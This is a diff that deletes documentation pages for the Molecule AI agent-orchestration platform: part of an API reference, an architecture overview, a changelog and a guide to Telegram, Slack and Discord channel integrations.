| GET | `/workspaces/:id/events/stream` | WorkspaceAuth | Open an SSE stream for the workspace. Returns `Content-Type: text/event-stream`. Sends an initial `: ping` comment on connect, then delivers every event emitted by the workspace in AG-UI envelope format. Events from other workspaces are filtered out. Returns `404` if the workspace does not exist. |
### Event envelope format
Each event is delivered as an SSE `data:` line containing a JSON object:
```json
{
"type": "AGENT_MESSAGE",
"timestamp": 1713398400000,
"data": { ... }
}
```
- **`type`** — event type string (e.g. `AGENT_MESSAGE`, `A2A_RESPONSE`, `TASK_UPDATED`)
- **`timestamp`** — Unix milliseconds at time of broadcast
- **`data`** — event-specific payload (same payload as the WebSocket hub delivers)
### Event types streamed
All event types emitted by `RecordAndBroadcast` **and** `BroadcastOnly` reach the SSE stream. The `BroadcastOnly` path is important: events like `AGENT_MESSAGE`, `A2A_RESPONSE`, and `TASK_UPDATED` skip Redis and would be invisible to a Redis-only subscriber — the in-process SSE layer catches them.
### Example: connect with `curl`
```bash
curl -N \
-H "Authorization: Bearer <workspace-token>" \
http://localhost:8080/workspaces/<id>/events/stream
```
```
: ping
data: {"type":"AGENT_MESSAGE","timestamp":1713398401234,"data":{"text":"Starting task..."}}
data: {"type":"TASK_UPDATED","timestamp":1713398405678,"data":{"status":"running"}}
```
### Example: connect from JavaScript
```js
const es = new EventSource(
`/workspaces/${workspaceId}/events/stream`,
{ headers: { Authorization: `Bearer ${token}` } }
);
es.onmessage = (e) => {
const event = JSON.parse(e.data);
console.log(event.type, event.data);
};
```
<Callout type="info">
The SSE endpoint uses WorkspaceAuth — the bearer token must be bound to the `:id` in the path. A token for workspace A cannot open a stream for workspace B.
</Callout>
---
## Error Responses
All endpoints return standard HTTP status codes:
| Status | Meaning |
|--------|---------|
| 200 | Success |
| 201 | Created |
| 400 | Bad request (malformed body, missing required fields) |
| 401 | Unauthorized (missing or invalid bearer token) |
| 403 | Forbidden (valid token but insufficient access) |
| 404 | Not found (workspace, schedule, channel, etc. does not exist) |
| 409 | Conflict (idempotency key collision on delegation) |
| 429 | Rate limited (exceeds `RATE_LIMIT` requests/min) |
| 500 | Internal server error |
Error response body format:
```json
{
"error": "human-readable error message"
}
```
---
## Rate Limiting
All endpoints are subject to a global rate limit of `RATE_LIMIT` requests per minute (default: 600). When exceeded, the platform returns `429 Too Many Requests` with a `Retry-After` header.
---
## CORS
The platform sets CORS headers based on the `CORS_ORIGINS` environment variable (comma-separated list, default: `http://localhost:3000,http://localhost:3001`). Preflight (`OPTIONS`) requests are handled automatically by the Gin CORS middleware.

View File

@ -1,361 +0,0 @@
---
title: Architecture
description: System architecture, components, infrastructure, and communication model for the Molecule AI platform.
---
# Architecture
Molecule AI is a platform for orchestrating AI agent workspaces that form an organizational hierarchy. Workspaces register with a central platform, communicate via A2A (Agent-to-Agent) protocol, and are visualized on a drag-and-drop canvas.
## System Overview
```
Canvas (Next.js :3000) <--WebSocket--> Platform (Go :8080) <--HTTP--> Postgres + Redis
|
Workspace A <----A2A----> Workspace B
(Python agents)
| register/heartbeat |
+------ Platform ----+
```
The Canvas provides the visual interface, the Platform acts as the control plane, and Workspaces are isolated containers running AI agent runtimes. All inter-agent communication is mediated by the Platform via the A2A proxy, which enforces hierarchical access control.
---
## Four Main Components
### Canvas
**Stack:** Next.js 15 + React Flow (@xyflow/react v12) + Zustand + Tailwind CSS
The Canvas is the browser-based visual workspace graph. It provides:
- **Drag-and-drop layout** with persistent node positions (saved via `PATCH /workspaces/:id`)
- **Team nesting** using recursive `TeamMemberChip` components (up to 3 levels deep)
- **Real-time status** via WebSocket connection to the Platform
- **Chat interface** with two sub-tabs: "My Chat" (user-to-agent) and "Agent Comms" (agent-to-agent A2A traffic)
- **Config editor** with "Save & Restart" and "Save" (deferred restart) modes
- **Secrets management** with auto-restart on POST/DELETE
**State management:**
| Concern | Mechanism |
|---------|-----------|
| Initial load | HTTP fetch `GET /workspaces` into Zustand |
| Real-time updates | WebSocket events via `applyEvent()` |
| Position persistence | `onNodeDragStop` sends `PATCH /workspaces/:id` with `{x, y}` |
| Node nesting | `nestNode` sets `hidden: !!targetId`; children render inside parent |
**Environment variables:**
| Variable | Default | Purpose |
|----------|---------|---------|
| `NEXT_PUBLIC_PLATFORM_URL` | `http://localhost:8080` | Platform API base URL |
| `NEXT_PUBLIC_WS_URL` | `ws://localhost:8080/ws` | WebSocket endpoint |
### Platform
**Stack:** Go / Gin
The Platform is the central control plane responsible for:
- **Workspace CRUD** -- create, read, update, delete workspaces
- **Registry** -- workspace registration, heartbeat tracking, agent card management
- **Discovery** -- peer lookup, access control checks
- **WebSocket hub** -- real-time event broadcasting to Canvas clients
- **Liveness monitoring** -- three-layer container health detection
- **A2A proxy** -- routes inter-agent messages with hierarchical access control
- **Docker provisioner** -- container lifecycle management with tier-based resource limits
- **Scheduler** -- cron-based scheduled tasks per workspace
- **Channel adapters** -- social integrations (Telegram, Slack, etc.)
**Key environment variables:**
| Variable | Default | Purpose |
|----------|---------|---------|
| `DATABASE_URL` | (required) | Postgres connection string |
| `REDIS_URL` | (required) | Redis connection string |
| `PORT` | `8080` | Server listen port |
| `PLATFORM_URL` | `http://host.docker.internal:PORT` | URL passed to agent containers |
| `SECRETS_ENCRYPTION_KEY` | (optional) | AES-256 key, 32 bytes |
| `CORS_ORIGINS` | `http://localhost:3000,http://localhost:3001` | Allowed CORS origins |
| `RATE_LIMIT` | `600` | Requests per minute |
| `MOLECULE_ENV` | (optional) | Set `production` to hide test endpoints |
| `MOLECULE_ORG_ID` | (optional) | SaaS tenant org gating |
| `WORKSPACE_DIR` | (optional) | Global fallback host path for `/workspace` bind-mount |
| `AWARENESS_URL` | (optional) | Injected into workspace containers for cross-session memory |
| `ACTIVITY_RETENTION_DAYS` | `7` | How long activity logs are kept |
| `ACTIVITY_CLEANUP_INTERVAL_HOURS` | `6` | Cleanup sweep interval |
**Workspace tier resource limits:**
| Tier | Env (Memory) | Env (CPU) | Defaults |
|------|-------------|-----------|----------|
| Standard (Tier 2) | `TIER2_MEMORY_MB` | `TIER2_CPU_SHARES` | 512 MB / 1 CPU |
| Privileged (Tier 3) | `TIER3_MEMORY_MB` | `TIER3_CPU_SHARES` | 2048 MB / 2 CPU |
| Full-host (Tier 4) | `TIER4_MEMORY_MB` | `TIER4_CPU_SHARES` | 4096 MB / 4 CPU |
### Workspace Runtime
**Published as:** [`molecule-ai-workspace-runtime`](https://pypi.org/project/molecule-ai-workspace-runtime/) on PyPI
The shared runtime provides the base agent infrastructure: A2A server, heartbeat loop, config loading, platform auth, plugin system, and built-in tools. Each AI framework adapter lives in its own standalone repository.
| Runtime | Standalone Repo | Key Dependencies |
|---------|-----------------|------------------|
| LangGraph | `molecule-ai-workspace-template-langgraph` | langchain-anthropic, langgraph |
| Claude Code | `molecule-ai-workspace-template-claude-code` | claude-agent-sdk, @anthropic-ai/claude-code |
| OpenClaw | `molecule-ai-workspace-template-openclaw` | openclaw (npm) |
| CrewAI | `molecule-ai-workspace-template-crewai` | crewai |
| AutoGen | `molecule-ai-workspace-template-autogen` | autogen |
| DeepAgents | `molecule-ai-workspace-template-deepagents` | deepagents |
| Hermes | `molecule-ai-workspace-template-hermes` | openai, anthropic, google-genai |
| Gemini CLI | `molecule-ai-workspace-template-gemini-cli` | @google/gemini-cli (npm) |
| [Google ADK](/docs/google-adk) | `molecule-ai-workspace-template-google-adk` | google-adk>=1.0.0 |
Each adapter repo has its own `Dockerfile` that installs `molecule-ai-workspace-runtime` from PyPI plus adapter-specific dependencies. Templates are cloned at Docker build time into the platform image via `manifest.json`.
### Framework Adapters (workspace-template)
Some workspace templates embed framework-specific adapters that extend `molecule-ai-workspace-runtime` with framework-level security controls. The **smolagents adapter** (`workspace-template/adapters/smolagents/`) ships two such controls:
**Environment sanitization** (`make_safe_env`) — child processes spawned by the smolagents adapter inherit a filtered copy of the host environment. The following are stripped before the subprocess starts:
- Any key listed in `SMOLAGENTS_ENV_DENYLIST` (comma-separated; set by the operator)
- Any key whose name ends in `_API_KEY` or `_TOKEN`
Set `SMOLAGENTS_ENV_DENYLIST=VAR1,VAR2` in the workspace's secrets to extend the denylist.
**Safe message delivery** (`safe_send_message`) — outbound smolagents messages are:
1. Prefixed with `[smolagents]` so the source is always attributable in logs and Canvas activity
2. Truncated at 2 000 characters to prevent oversized payloads
3. HTML-entity-escaped to block social-engineering injections embedded in agent output
These controls complement the platform-level secret redaction described in the [API Reference](/docs/api-reference#agent-memories-hma-scoped).
### molecli
**Stack:** Go / Bubbletea + Lipgloss
A terminal UI dashboard for real-time workspace monitoring, event log streaming, health overview, and delete/filter operations. Reads `MOLECLI_URL` (default `http://localhost:8080`) to locate the platform. Now published as a standalone repo at `github.com/Molecule-AI/molecule-cli`.
---
## Infrastructure Services
All services run via `docker-compose.infra.yml`, attached to the shared `molecule-monorepo-net` network. Start them with:
```bash
./infra/scripts/setup.sh # Start Postgres, Redis, Langfuse, Temporal; run migrations
```
### Postgres (port 5432)
Primary datastore for workspaces, events, activity logs, secrets, schedules, channels, and more. Also backs Langfuse and Temporal via separate databases.
Key tables:
| Table | Purpose |
|-------|---------|
| `workspaces` | Core entity -- status, runtime, agent_card, heartbeat, current_task |
| `canvas_layouts` | Persisted x/y positions |
| `structure_events` | Append-only event log |
| `activity_logs` | A2A communications, task updates, agent logs, errors |
| `workspace_schedules` | Cron tasks with expression, timezone, prompt, run history |
| `workspace_channels` | Social channel integrations with JSONB config |
| `workspace_secrets` / `global_secrets` | Encrypted secrets storage |
| `workspace_auth_tokens` | Bearer tokens (auto-revoked on workspace delete) |
| `agent_memories` | HMA-scoped agent memory |
| `approvals` | Human-in-the-loop approval requests |
**Migration runner:** On startup, the platform globs `*.sql` in the migrations directory, filters out `.down.sql` files, sorts alphabetically, and executes each. All `.up.sql` files must be idempotent (`CREATE TABLE IF NOT EXISTS`, `ALTER TABLE ... IF NOT EXISTS`).
**JSONB gotcha:** When inserting Go `[]byte` (from `json.Marshal`) into Postgres JSONB columns, you must convert to `string()` first and use `::jsonb` cast in SQL. The `lib/pq` driver treats `[]byte` as `bytea`, not JSONB.
### Redis (port 6379)
Used for pub/sub event broadcasting and heartbeat TTL tracking. Workspace heartbeat keys expire after 60 seconds -- expiry triggers the liveness monitor.
### Langfuse (port 3001)
LLM trace viewer backed by ClickHouse. Provides observability into agent LLM calls, token usage, and latency.
### Temporal (port 7233 gRPC, port 8233 Web UI)
Durable workflow engine for `workspace-template/builtin_tools/temporal_workflow.py`. Dev-only posture: the auto-setup image runs with no auth on `0.0.0.0:7233`. Production deployments must gate access via mTLS or an API key / reverse proxy.
---
## Communication Model
### WebSocket Events Flow
```
1. Action occurs (register, heartbeat, config change, etc.)
2. broadcaster.RecordAndBroadcast()
-> inserts into structure_events table
-> publishes to Redis pub/sub
3. Redis subscriber relays to WebSocket hub
4. Hub broadcasts to:
- Canvas clients (all events)
- Workspace clients (filtered by CanCommunicate)
```
### A2A Proxy
The A2A proxy (`POST /workspaces/:id/a2a`) routes agent-to-agent messages. The caller identifies itself via the `X-Workspace-ID` header and authenticates with `Authorization: Bearer <token>`.
### Access Control Rules
Determined by `CanCommunicate(callerID, targetID)` in `registry/access.go`:
| Relationship | Allowed |
|-------------|---------|
| Same workspace (self-call) | Yes |
| Siblings (same `parent_id`) | Yes |
| Root-level siblings (both `parent_id` IS NULL) | Yes |
| Parent to child / child to parent | Yes |
| System callers (`webhook:*`, `system:*`, `test:*`) | Yes (bypass) |
| Canvas requests (no `X-Workspace-ID`) | Yes (bypass) |
| Everything else | **Denied** |
### Import Cycle Prevention
The platform uses function injection to avoid Go import cycles between `ws`, `registry`, and `events` packages:
- `ws.NewHub(canCommunicate AccessChecker)` -- Hub accepts `registry.CanCommunicate` as a function
- `registry.StartLivenessMonitor(ctx, onOffline OfflineHandler)` -- Liveness accepts broadcaster callback
- `registry.StartHealthSweep(ctx, checker ContainerChecker, interval, onOffline)` -- Health sweep accepts Docker checker interface
- Wiring happens in `platform/cmd/server/main.go` -- init order: `wh -> onWorkspaceOffline -> liveness/healthSweep -> router`
---
## Container Health Detection
Three independent layers detect dead containers (e.g., Docker Desktop crash):
### Layer 1: Passive (Redis TTL)
Each workspace sends heartbeats that set a Redis key with a 60-second TTL. When the key expires, the liveness monitor detects the workspace as offline and triggers an auto-restart.
### Layer 2: Proactive (Health Sweep)
`registry.StartHealthSweep` polls the Docker API every 15 seconds. Catches dead containers faster than waiting for Redis TTL expiry.
### Layer 3: Reactive (A2A Proxy)
When the A2A proxy encounters a connection error to a workspace, it immediately checks `provisioner.IsRunning()`. If the container is dead, it marks the workspace offline and triggers a restart.
All three layers call `onWorkspaceOffline`, which broadcasts `WORKSPACE_OFFLINE` and initiates `wh.RestartByID()`. Redis cleanup uses the shared `db.ClearWorkspaceKeys()` function.
---
## Workspace Lifecycle
```
provisioning --> online (on register)
^ |
| degraded (error_rate > 0.5)
| |
| online (recovered)
| |
| offline (Redis TTL expired / health sweep)
| |
+--- auto-restart ---+
|
removed (deleted)
Any state --> paused (user pauses) --> provisioning (user resumes)
```
Paused workspaces skip health sweep, liveness monitor, and auto-restart.
**Restart context:** After any restart and successful re-registration, the platform sends a synthetic A2A `message/send` with `metadata.kind=restart_context` containing the restart timestamp, previous session info, and available env-var keys (keys only, never values). The sender uses the `system:restart-context` caller prefix to bypass `CanCommunicate`. If the workspace does not re-register within 30 seconds, the message is dropped.
**Initial prompt:** Agents can auto-execute a prompt on startup before any user interaction. Configure via `initial_prompt` (inline string) or `initial_prompt_file` (path relative to config dir) in `config.yaml`. A `.initial_prompt_done` marker file prevents re-execution on restart.
**Idle loop:** When `idle_prompt` is non-empty in `config.yaml`, the workspace self-sends it every `idle_interval_seconds` (default 600) while `heartbeat.active_tasks == 0`. The idle check is local (no LLM call) and the prompt only fires when the agent is genuinely idle.
---
## Deployment Modes
### Self-Hosted
Run the full stack on your own infrastructure using Docker Compose:
```bash
# Infrastructure only (Postgres, Redis, Langfuse, Temporal)
docker compose -f docker-compose.infra.yml up -d
# Full stack
docker compose up
```
### SaaS
Hosted at `moleculesai.app` with per-tenant isolation. Each tenant gets a dedicated Fly Machine running the tenant image. The `MOLECULE_ORG_ID` env var gates API access -- every non-allowlisted request must carry a matching `X-Molecule-Org-Id` header or gets a 404. When unset, the guard is a passthrough so self-hosted and dev environments are unaffected.
### Tenant Image
`platform/Dockerfile.tenant` bundles the Go platform + Canvas frontend + templates into a single container image, published to `ghcr.io/molecule-ai/platform:latest` and `:sha-<short>`.
---
## Subdomain Architecture
| Subdomain | Service | Purpose |
|-----------|---------|---------|
| `moleculesai.app` | Landing page | Marketing site |
| `app.moleculesai.app` | SaaS dashboard | Tenant management UI |
| `api.moleculesai.app` | Control plane API | Platform REST + WebSocket |
| `doc.moleculesai.app` | Documentation | This documentation site |
| `status.moleculesai.app` | Status page | Uptime and incident tracking |
| `*.moleculesai.app` | Tenant instances | Per-org isolated platform instances |
---
## Plugin System
Plugins extend workspace capabilities. Two categories exist:
**Shared plugins** (auto-loaded by every workspace):
- **molecule-dev** -- codebase conventions + review-loop skill
- **superpowers** -- verification, TDD, systematic debugging, writing plans
- **ecc** -- general Claude Code guardrails
- **browser-automation** -- Puppeteer/CDP web scraping and live canvas screenshots
**Modular guardrails** (opt-in per workspace):
- **Hook plugins** (ambient enforcement): `molecule-careful-bash`, `molecule-freeze-scope`, `molecule-audit-trail`, `molecule-session-context`, `molecule-prompt-watchdog`
- **Skill plugins** (on-demand): `molecule-skill-code-review`, `molecule-skill-cross-vendor-review`, `molecule-skill-llm-judge`, `molecule-skill-update-docs`, `molecule-skill-cron-learnings`
- **Workflow plugins** (slash commands): `molecule-workflow-triage`, `molecule-workflow-retro`
**Org-template plugin resolution:** Per-workspace `plugins:` lists in org template `org.yaml` role overrides UNION with `defaults.plugins` (deduplicated, defaults first). To opt a specific default out for a given role, prefix the plugin name with `!` or `-` (e.g. `!browser-automation`).
Plugin install safeguards:
| Parameter | Default | Purpose |
|-----------|---------|---------|
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | 65536 (64 KiB) | Max request body size |
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | 5m | Whole fetch+copy deadline |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | 104857600 (100 MiB) | Max staged-tree size |
---
## CI Pipeline
GitHub Actions runs on push to main and on pull requests:
| Job | What it does |
|-----|-------------|
| `platform-build` | Go build, vet, `go test -race` with 25% coverage threshold |
| `canvas-build` | npm build, vitest run (tests must exist and pass) |
| `python-lint` | pytest with coverage for workspace-template |
| `e2e-api` | Spins up Postgres + Redis, runs 62 API tests against locally-built binary |
| `shellcheck` | Lints all E2E shell scripts |
| `publish-platform-image` | Builds and pushes to `ghcr.io/molecule-ai/platform` (main only) |
Standalone repos (plugins + templates) use reusable workflows from `Molecule-AI/molecule-ci` for schema validation, secrets scanning, and Docker build smoke tests.

View File

@ -1,217 +0,0 @@
---
title: Changelog
description: Customer-facing release notes for Molecule AI — updated daily.
---
All notable changes to the Molecule AI platform are documented here.
Entries are published daily at 23:50 UTC.
---
## 2026-04-17
A high-velocity day: 80+ PRs merged across platform, canvas, runtimes, security, and channels.
### ✨ New features
#### opencode Integration — MCP bridge for AI coding agents
Connect [opencode](https://opencode.ai) to any Molecule AI workspace over a
standard `Authorization: Bearer` remote MCP connection. opencode gains the full
A2A tool surface (`delegate_task`, `list_peers`, `recall_memory`, and more)
via two transports: Streamable HTTP (`POST /workspaces/:id/mcp`) and SSE
(backwards-compat `GET /workspaces/:id/mcp/stream`). Rate-limited to 120 req/min
per token. See the [opencode Integration guide](/docs/opencode).
(#840, #842)
#### Slack — per-agent identity with Bot Token mode
The Slack channel adapter now supports dual-mode outbound: **Bot Token** (new,
recommended) and Incoming Webhook (legacy, unchanged). With a `bot_token` each
workspace posts under its own display name and icon via `chat:write.customize`.
Markdown is automatically converted to Slack `mrkdwn` format.
See [Channels](/docs/channels).
(#844, #851)
#### AG-UI compatible SSE endpoint
New `GET /workspaces/:id/events` endpoint streams agent events as AG-UI
compatible Server-Sent Events. Enables AG-UI frontend integrations to subscribe
to live workspace activity without polling.
(#601)
#### A2A topology overlay on the canvas
The canvas now renders a live A2A topology overlay — every workspace as a node,
every in-flight delegation as an animated directed edge. Zoom to team, click any
edge to inspect the task payload.
(#751)
#### Audit trail visualisation panel
A new audit trail panel in the canvas surfaces the HMAC-SHA256 immutable event
log per workspace — every task received, LLM call, and completion in
chronological order with chain-of-custody verification.
(#651, #759)
#### Workspace hibernation — auto-pause idle workspaces
Workspaces that receive no tasks for `HIBERNATION_IDLE_MINUTES` (default: 30)
are automatically hibernated (containers paused, resources freed). They
auto-wake on the next inbound task with full state restored. Manage via
`POST /workspaces/:id/hibernate` and `POST /workspaces/:id/wake`.
See [API Reference](/docs/api-reference).
(#724)
#### Temporal workflow checkpoints — step-level persistence
Workspace templates now persist intermediate workflow steps to the database.
On container restart (crash, deploy, hibernate/wake) the workspace resumes from
the last completed step rather than restarting the whole task. Step endpoints
documented in the [API Reference](/docs/api-reference).
(#797, #803)
#### Semantic memory search
Agent memory is now vector-indexed via pgvector. `recall_memory` accepts an
optional `?q=` parameter for semantic (embedding) search in addition to exact
keyword match. Nearest-neighbour results are ranked by cosine similarity and
colour-coded in the canvas Memory Inspector.
(#784, #787)
#### Memory Inspector panel
A new canvas panel lets you browse, search, and inspect all `LOCAL` and `TEAM`
memory keys for any workspace — live, without leaving the canvas.
(#738)
#### Hermes — stacked system messages
The Hermes runtime now accepts a `system_blocks` list: each block (persona,
tools, reasoning policy) is merged in order rather than overwriting the previous
system prompt. Enables persona stacking for complex multi-role workflows.
See [API Reference](/docs/api-reference) → Runtimes section.
(#655, #798)
#### Hermes — native `tools` parameter
Hermes passes tools to the model via the native `tools=[]` API parameter instead
of text-in-prompt injection. Structured tool definitions, better token efficiency,
and full compatibility with Nous/Hermes-3 tool call format.
(#644)
#### Hermes — structured output (`response_format`)
`response_format=json_schema` is now wired through to the model. Hermes
workspaces can request strict JSON output against a defined schema.
(#645)
#### AGENTS.md auto-generation
Platform workspaces now auto-generate an `AGENTS.md` file in the workspace
container at boot. The file lists all peer workspaces visible to this workspace,
their roles, and their capabilities — giving LLMs automatic context about the
org topology without manual prompt engineering.
(#763)
#### Discord channel adapter
A new Discord adapter joins Telegram, Slack, and Lark. Configure with a
`bot_token` and `channel_id` to send and receive messages on Discord.
(#656)
#### Per-workspace budget limits
Set a `budget_limit` (USD) on any workspace. The A2A executor enforces the limit
at task dispatch — tasks that would exceed the monthly cap are rejected with a
`429 Budget Exceeded` error. Configure via `PATCH /workspaces/:id`.
(#611, #606)
#### Per-workspace token metrics
`GET /workspaces/:id/metrics` returns token counts (input, output, cache read/write)
aggregated over rolling 1-hour and 30-day windows. Live usage is displayed in the
canvas WorkspaceUsage panel.
(#602, #627)
#### Claude Opus 4.7 — effort levels and task budget
Workspace config now exposes `effort` (`low` / `medium` / `high` / `xhigh` /
`max`) and `task_budget` (token ceiling) for Anthropic Claude workspaces.
`xhigh` and `max` activate extended thinking (Opus 4.7+ only). Configure in the
Canvas Config tab or via `PATCH /workspaces/:id`.
(#639, #654, #669)
#### Plugin supply-chain hardening
All plugin refs must now be pinned (no `latest`, no floating branches). Unpinned
refs are blocked at load time unless `PLUGIN_ALLOW_UNPINNED=true`. SHA-256
integrity checking available for plugin archives.
(#775)
#### Org-level plugin governance registry
A new per-org allowlist controls which plugins workspaces in that org are
permitted to load. Managed via `POST/DELETE /admin/orgs/:orgId/plugins/allowlist`.
(#610)
#### Schedule health endpoint
`GET /admin/schedules/health` returns cross-workspace cron health: last-fired,
next-scheduled, consecutive-empty count, and phantom detection status for every
schedule in the org.
(#671, #796)
#### Fly Machines provisioner
The platform now supports `PROVISIONER=flyio` — workspaces are provisioned as
Fly Machines instead of Docker containers or EC2 instances. See the
[self-hosting guide](/docs/self-hosting).
(#578 — docs PR #7)
### 🔒 Security
- **Auth hardening** — PATCH `/workspaces/:id` now requires ownership
validation; UUID fields are validated before DB queries; input lengths bounded
across all handlers. (#692, #701)
- **Admin token isolation** — `AdminAuth` middleware correctly rejects workspace
bearer tokens when `ADMIN_TOKEN` is set, preventing privilege escalation from
workspace token → admin. (#684, #729)
- **Metrics route auth** — `GET /workspaces/:id/metrics` now requires workspace
bearer token; previously it was unauthenticated. (#696)
- **X-Workspace-ID forgery** — Requests spoofing the `system-caller/` prefix in
`X-Workspace-ID` headers are rejected. (#766)
- **GLOBAL memory injection safeguards** — `commit_memory` with `scope: GLOBAL`
now validates content for prompt injection patterns before persisting. (#769)
- **Security headers** — `X-Content-Type-Options: nosniff` and
`X-Frame-Options: DENY` added to all API responses. (#629)
- **Token revocation hardening** — Revoked tokens are purged from the in-memory
cache within 60s; previously the cache could serve revoked tokens until TTL
expiry. (#696)
- **MCP server** — npm version pinned; `-y` flag removed from install commands.
(SAFE-MCP NEW-003, #808 — docs PR #18)
- **Canvas test-token endpoint** — gated behind `AdminAuth` and removed from
general router. (#612, #708)
### 🔧 Fixes
- Fixed `POST /workspaces` not persisting the secrets envelope on create. (#568)
- Fixed self-delegation deadlock when a workspace delegates to itself. (#570)
- Fixed GitHub installation token expiry — tokens now refresh automatically before
expiry rather than failing mid-operation. (#567)
- Fixed `TenantGuard` same-origin bypass for EC2 tenant Canvas. (#584)
- Fixed pgvector migration to wrap in `DO` block, eliminating E2E CI failures
from duplicate extension install. (#843, #670, #636)
- Fixed scheduler dropping schedules with `NULL next_run_at` permanently. (#728)
- Fixed `ValidateToken` not checking `removed` workspace status, allowing tokens
for deleted workspaces to authenticate. (#719)
- Fixed canvas hydration error UI, radio keyboard nav, and zoom-to-team
shortcut. (#565)
- Fixed canvas UX: error handling, accessibility, loading state. (#587)
- Fixed canvas deploy preflight to require env keys for Hermes and Gemini CLI
runtimes. (#588)
- Fixed budget/spend counters capping before DB upsert to prevent NUMERIC
overflow. (#630, #634)
- Fixed pgvector TEXT→UUID FK type mismatch in migrations 028 and 031 that
blocked all E2E runs. (#646, #670, #843)
- Fixed duplicate hook firings (34×) in `dedup_settings_hooks`. (#551, #597)
- Accessibility fixes: keyboard access on `TeamMemberChip`, `role=alert` on
status banners, close button label, `ProvisioningTimeout` modal. (#841)
### 📚 Docs
- Google ADK runtime — added hands-on Quickstart section. (docs PR #8)
- Hermes — full runtime reference page. (docs PR #9)
- AGENTS.md — auto-generation documented in concepts. (docs PR #10)
- Semantic memory search — `?q=` param documented in API reference. (docs PR #11)
- Canvas A2A topology overlay + audit trail panel. (docs PR #12)
- molecule-medo plugin — opt-in platform plugin page. (docs PR #13)
- Workspace hibernation — status lifecycle, endpoints, auto-wake behaviour. (docs PR #14)
- molecule-audit-ledger — HMAC chain, `/audit` endpoint, `LedgerHooks`, CLI. (docs PR #15)
- Hermes stacked system messages — `system_blocks` kwarg. (docs PR #16)
- Plugin supply chain security — pinned refs required, SHA-256 integrity. (docs PR #17)
- SAFE-MCP audit report 2026-04-17. (docs PR #18)
- Temporal workflow checkpoints — step endpoints, auto-resume behaviour. (docs PR #19)
---
_Changelog entries are compiled by the [Documentation Specialist](https://github.com/Molecule-AI) from all merged pull requests for the day. Times are UTC._

View File

@ -1,338 +0,0 @@
---
title: Channels
description: Connect workspaces to Telegram, Slack, Discord, and Lark/Feishu for social integrations.
---
## Overview
Channels let workspaces send and receive messages on social platforms. Each
workspace can have multiple channel integrations — a Telegram bot, a Slack
webhook, a Discord webhook, a Lark/Feishu Custom Bot — configured independently with per-channel
allowlists and JSONB config.
Outbound messages flow from the workspace through the platform adapter to the
social platform. Inbound messages arrive via webhooks (`POST /webhooks/:type`),
are parsed by the adapter, and forwarded to the workspace as A2A
`message/send` requests.
```
User (Telegram/Slack/Discord/Lark) ──webhook──> Platform ──A2A──> Workspace Agent
<──adapter── (response)
User <──bot message────────────────────────────────────────────────/
```
---
## Adapters
Four adapters are registered out of the box. Use `GET /channels/adapters` to
list them at runtime.
### Telegram
Uses the Telegram Bot API. Supports both long-polling (for inbound) and direct
API calls (for outbound). The adapter caches `BotAPI` instances to avoid
repeated `getMe` calls.
**Required config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `bot_token` | string | Telegram bot token (`123456789:ABCdef...`). Validated against a strict regex. |
| `chat_id` | string | Comma-separated chat IDs to listen on and send to. |
**Features:**
- Long-polling with 30s timeout and 2s retry interval
- Auto-reply to `/start` with the chat ID (useful for setup)
- Bot commands: `/start`, `/help`, `/reset` (clear history), `/cancel` (best-effort)
- Long messages automatically split at paragraph/line/word boundaries (4096 char limit)
- Typing indicator sent while the agent processes
- Rate-limit handling with `retry_after` backoff
- Auto-discovers chats via `getUpdates` (including `my_chat_member` events for group adds)
- Auto-disables the channel when the bot is kicked from a chat
### Slack
Supports two outbound modes — Bot Token (recommended) and Incoming Webhook
(legacy). Inbound uses the Slack Events API in both modes.
**Config fields:**
| Field | Type | Required | Description |
|-------|------|----------|-------------|
| `bot_token` | string | One of `bot_token` / `webhook_url` | Slack Bot User OAuth Token (`xoxb-…`). Enables per-agent display name and icon via `chat:write.customize`. |
| `webhook_url` | string | One of `bot_token` / `webhook_url` | Incoming Webhook URL (must start with `https://hooks.slack.com/`). Used as fallback when `bot_token` is absent. |
| `channel` | string | Required with `bot_token` | Target channel ID or name (e.g. `C01234ABCDE` or `#general`). |
| `username` | string | Optional | Display name override shown in Slack (Bot Token mode only). |
| `icon_emoji` | string | Optional | Emoji icon for the agent's avatar (e.g. `:robot_face:`). Bot Token mode only. |
**Features:**
- **Bot Token mode** — per-agent identity: each workspace can post with its own
name and icon using `chat.postMessage` + `chat:write.customize`. Markdown is
automatically converted to Slack `mrkdwn` format.
- **Webhook mode** — simple outbound-only integration, no OAuth required.
- Inbound via Events API JSON payload or slash command (URL-encoded form).
- `url_verification` challenge handshake supported.
- Slash commands prepend the command name so the agent sees the full invocation.
**Required Slack app scopes (Bot Token mode):**
`chat:write`, `chat:write.customize`, `channels:history`, `app_mentions:read`
### Discord
Uses Discord Incoming Webhooks for outbound and Discord Interactions (slash commands) for inbound. Discord uses a push-based interactions model — there is no long-polling; the platform receives signed payloads at the interactions endpoint.
**Required config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `webhook_url` | string | Discord Incoming Webhook URL. Must start with `https://discord.com/api/webhooks/`. Validated on creation (matches the Slack SSRF-guard pattern). |
**Global secret:**
```bash
# Register the webhook URL as a global or per-workspace secret
curl -X PUT http://localhost:8080/settings/secrets \
-H 'Content-Type: application/json' \
-d '{"key":"DISCORD_WEBHOOK_URL","value":"https://discord.com/api/webhooks/..."}'
```
**Features:**
- Outbound via Incoming Webhook — POSTs `{"content": "<text>"}` to the webhook URL
- Long messages automatically split at newline/space boundaries (Discord 2000-character hard limit)
- Inbound via Discord Interactions — no long-polling; Discord pushes signed payloads
- **Type 1 PING** — router layer responds `{"type":1}`; adapter returns `nil` (no A2A forward)
- **Type 2 APPLICATION\_COMMAND** — slash command, forwarded as `/commandname option1 option2`
- **Type 3 MESSAGE\_COMPONENT** — button/select interaction, forwarded as component data
- User identity prefers `member.user` (guild) over `user` (DM) for consistent routing
- `StartPolling` is a no-op (returns nil) — Discord uses interactions, not polling
**Setup:**
1. **Incoming Webhook** — Discord Server → channel settings → Integrations → Webhooks → New Webhook → Copy Webhook URL
2. Add as a secret: `PUT /settings/secrets` with `DISCORD_WEBHOOK_URL`
3. **Slash commands (inbound)** — create a Discord Application at [discord.com/developers](https://discord.com/developers/applications), set the **Interactions Endpoint URL** to `https://<platform-host>/webhooks/discord`
4. Verify the endpoint: Discord sends a type-1 PING; the platform responds `{"type":1}` automatically
**Example config:**
```json
{
"type": "discord",
"config": {
"webhook_url": "https://discord.com/api/webhooks/1234567890/abcdef..."
}
}
```
